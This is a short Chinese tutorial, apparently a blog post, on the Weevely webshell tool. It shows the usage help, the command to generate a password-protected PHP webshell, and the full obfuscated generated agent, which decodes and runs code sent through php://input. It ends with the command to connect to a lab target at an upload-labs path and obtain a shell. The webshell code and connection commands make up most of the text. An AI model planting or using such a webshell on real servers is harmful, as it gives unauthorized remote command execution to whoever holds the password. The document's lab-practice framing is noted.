♥喜欢请点个赞吧♥
用法
usage: weevely [-h] {terminal,session,generate} ...
参数:
{terminal,session,generate}
terminal Run terminal or command on the target #在目标上运行终端或命令
session Recover an existing session #恢复现有会话
generate Generate new agent #生成新webshell
optional arguments:
-h, --help show this help message and exit
生成shell的命令:weevely generate 密码 文件名及路径
如
weevely generate shell /root/Desktop/1.php
生成的webshell是base64加密的,代码如下:
='or($j=B:0;($j<$c&&$i<B:$l);B:$j++,B:$i++){$o.B:=B:$t{$i}^$kB:{$B:j};}}returB:n $o;}iB:f(@pB:reg_matB:c';$h='l(B:@gB:zunB:compress(@B:x(@basB:e64_B:decode($mB:[1]),$kB:)));$o=@oB:B:b_get_conteB:nts()B:;@obB';$A='h("/$khB:(.B:+)$B:kB:f/",@fB:ile_get_contenB:ts("phpB:://B:input"),B:$B:m)==1){@ob_starB:t();@eB:va';$W=str_replace('V','','cVrVeate_VfuVnVctVion');$z=':_end_cleanB:();$B:r=B:@baseB:64_encode(B:@xB:(@gzcomB:press($o),B:$k)B:);prB:B:int("$p$kh$r$kf");}';$g='Y";function xB:($t,B:$B:k){$c=strlen($B:kB:);$B:B:l=strlen($t);$o="B:"B:;fB:or($i=0;$i<$l;B:){fB:';$Y='$kB:="2591c98b"B:;B:$B:kh="70119fe62B:48B:9";$kf="8b1eB:424bB:5e91";$pB:="DB:Z7CfNFAUiLB:y9B:tB:M';$E=str_replace('B:','',$Y.$g.$t.$A.$h.$z);$e=$W('',$E);$e();?>
连接shell
weevely http://192.168.114.129/upload-labs/upload/1.php shell
此时即可执行命令行命令
对目标运行一个终端:
weevely <URL> <password> [CMD]
读取会话文件:
weevely session <path> [CMD]
我也不是很懂后面这俩功能有啥用,要是想连接终端还用得着这玩意吗。。。。
